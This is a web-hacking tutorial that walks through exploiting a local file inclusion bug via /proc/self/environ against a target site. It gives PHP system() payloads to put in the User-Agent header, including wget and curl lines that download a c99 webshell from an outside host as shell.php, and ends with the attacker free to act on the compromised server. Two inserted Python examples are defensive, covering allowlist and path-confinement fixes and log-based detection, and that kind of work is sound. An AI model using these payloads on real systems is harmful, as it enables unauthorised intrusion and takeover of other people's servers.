EXPLOITING LFI VULNERABILITIES via /PROC/SELF/ENVIRON
credits-kaotic
I previously covered how to exploit LFI vulnerabilities with FIMAP but have received some questions from folks due to FIMAP not always picking the injection points up. Automated tools are nice, but if you don't know how to do it manually then you can miss a lot of possible vulnerabilities and opportunities you can leverage to exploit your target (plus it's good to know what goes on behind the scenes). Today I am going to show you how to perform LFI exploitation through the /proc/self/environ method. Here goes…
OK, so first we walk through our site and we notice a link which seems to be referencing another document on the server. This is a good place to start investigating potential LFI vulnerabilities.
We click on "Contact Us", which leads us to...
NOTE: page= appears to reference another document on the server (in this case contacts.php).
Let us see what happens if we replace the standard link with some arbitrary data:
Now let us try to reference a real document which we know to be on all Unix machines, /etc/passwd:
Voila!
We can read the /etc/passwd file through LFI! This is good, but now we need to check to see if /proc/self/environ is accessible. If it is, we can leverage it to get a shell on the target site. If it is not, then we will need to further investigate which files we can access and then see if we can inject into any of them. I will only be focusing on the /proc/self/environ method for now, but may write another follow-up in future to cover some of the other methods which can be used for LFI takeover. OK, so now we check for the existence of /proc/self/environ:
NOTE the “DOCUMENT_ROOT=[VALUE]” on the returned page.
This is the key indicator that we have access to /proc/self/environ, which we can now leverage to put a shell on the target site. We will accomplish this by injecting our PHP code into the User-Agent field when we request this file again. On servers where PHP runs in a mode that exposes request headers as process environment variables (the case this walkthrough assumes), the User-Agent shows up in /proc/self/environ as HTTP_USER_AGENT, and the vulnerable include treats the file's contents as PHP source, so our code is executed and we can then use it to escalate privileges further. We will now inject this code into our page request for /proc/self/environ and refresh the page.
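Added example, not part of the original post or of the target application: the defender's side of this bug, written in Python (the vulnerable application is PHP, but the checks are identical and port line for line). The first function replaces a raw page= include with an allowlist, so the request never carries a file path at all; the second is the fallback when a file name must be accepted from the client, confining it to the document root so that /proc/self/environ, ../../../../etc/passwd and null-byte truncation are all rejected. The document root and page names are constructed for the example.

```python
import os

# Constructed values for the example; the real application's document root
# (the DOCUMENT_ROOT seen in /proc/self/environ) and page names will differ.
DOCUMENT_ROOT = "/var/www/html"
ALLOWED_PAGES = {
    "contacts": "contacts.php",
    "about": "about.php",
}


def resolve_page_allowlist(page_param):
    """Preferred fix: map a short token to a file name.

    The request never carries a path, so there is nothing to traverse; any
    value not in the map (including /proc/self/environ) yields None and the
    caller should respond 404 instead of including anything.
    """
    return ALLOWED_PAGES.get(page_param)


def resolve_page_confined(page_param, document_root=DOCUMENT_ROOT):
    """Fallback when a file name must be accepted from the client.

    Rejects embedded null bytes (used to truncate an appended ".php"), joins
    the value onto the document root and accepts the result only if it still
    lies strictly inside that root. An absolute value such as
    /proc/self/environ is never really joined: os.path.join discards the root
    when its second argument is absolute, so the candidate lands outside the
    root and is rejected like a traversal.
    """
    if "\x00" in page_param:
        return None
    candidate = os.path.normpath(os.path.join(document_root, page_param))
    # normpath is purely lexical so this runs offline; on a live system use
    # os.path.realpath on both sides so symlinks cannot escape the root either.
    if candidate == document_root:
        return None
    if os.path.commonpath([document_root, candidate]) != document_root:
        return None
    return candidate


if __name__ == "__main__":
    for value in ["contacts.php", "../../../../etc/passwd", "/proc/self/environ"]:
        print(f"{value!r:32} -> {resolve_page_confined(value)}")
```

The allowlist is the fix to reach for; the confinement check exists for legacy code that cannot be changed to tokens, and in PHP it should be done with realpath() on both the document root and the candidate (realpath() returns false for a non-existent file, which is itself a rejection).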
Inject PHP code in the UA field, like one of these:
ID: <?system('id');?>
UNAME: <?system('uname -a');?>
UPLOAD SHELL WITH WGET: <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
OR
UPLOAD SHELL WITH CURL: <?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>
We can now read the results of any of the commands we pass through in the User-Agent field; it will look similar to this:
NOTE: to inject the code into the User-Agent field you will need an add-on for your browser such as Live HTTP Headers, Tamper Data, or Burp Suite.
Once our code is injected we simply navigate to the webshell we just uploaded; it should be located at site.com/shell.php unless you instructed it to go elsewhere when you used your WGET or CURL command for the shell download. If you're lucky, when you go to your shell you will be greeted with something similar to this:
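Added example, not from the original post: detection logic for the access log of a server being probed this way, in Python. It parses constructed combined-format log lines (the User-Agent in the third line is the page's own <?system('id');?> payload) and flags the indicators the walkthrough relies on: traversal sequences and /etc/passwd or /proc/self/environ in a query value, null bytes, and a PHP open tag in the User-Agent. It then reports the client addresses that combined the /proc/self/environ request with PHP in the User-Agent on the same request, which is the injection step rather than a mere probe. Addresses, timestamps and sizes are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format: the User-Agent is the last quoted field,
# which is exactly the field this technique abuses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a normal page view, an /etc/passwd read, the
# /proc/self/environ request carrying PHP in the User-Agent, then a hit on
# a .php file that did not exist before. All values are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=contacts.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 3072 "-" "<?system(\'id\');?>"',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /shell.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def lfi_indicators(entry):
    """Sorted names of the indicators that fire for one parsed entry; [] if none."""
    hits = set()
    # parse_qsl URL-decodes each value, so %2e%2e%2f and %00 are inspected decoded.
    query = urlsplit(entry["path"]).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        if "../" in value or "..\\" in value:
            hits.add("path_traversal")
        if "/proc/self/environ" in value:
            hits.add("proc_self_environ")
        if "/etc/passwd" in value:
            hits.add("etc_passwd_read")
        if "\x00" in value:
            hits.add("null_byte")
    if "<?" in entry["ua"]:
        hits.add("php_tag_in_user_agent")
    return sorted(hits)


def scan(lines):
    """(ip, request path, indicators) for every line that fires at least one indicator."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = lfi_indicators(entry)
        if hits:
            findings.append((entry["ip"], entry["path"], hits))
    return findings


def injection_sources(lines):
    """Client addresses that requested /proc/self/environ with a PHP open tag in
    the User-Agent on the same request: the injection step, not just a probe."""
    sources = set()
    for ip, _, hits in scan(lines):
        if "proc_self_environ" in hits and "php_tag_in_user_agent" in hits:
            sources.add(ip)
    return sources


if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ", ".join(hits))
    print("injection sources:", sorted(injection_sources(SAMPLE_LOG)))
```

The fourth sample line carries no indicator on its own, which is the point: a request for a .php path that was not in the web root the day before, from an address that just fired injection_sources, is the follow-up to look for, so pair this scan with a file-integrity check of the document root rather than relying on the request log alone.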
Now that you have a shell on the site you are fairly free to do what you want. I hope you have enjoyed another brief tutorial on LFI. I will try to work on follow-up articles covering the Log Injection method and one or two more methods that can be used when the conditions are right. Until next time, enjoy!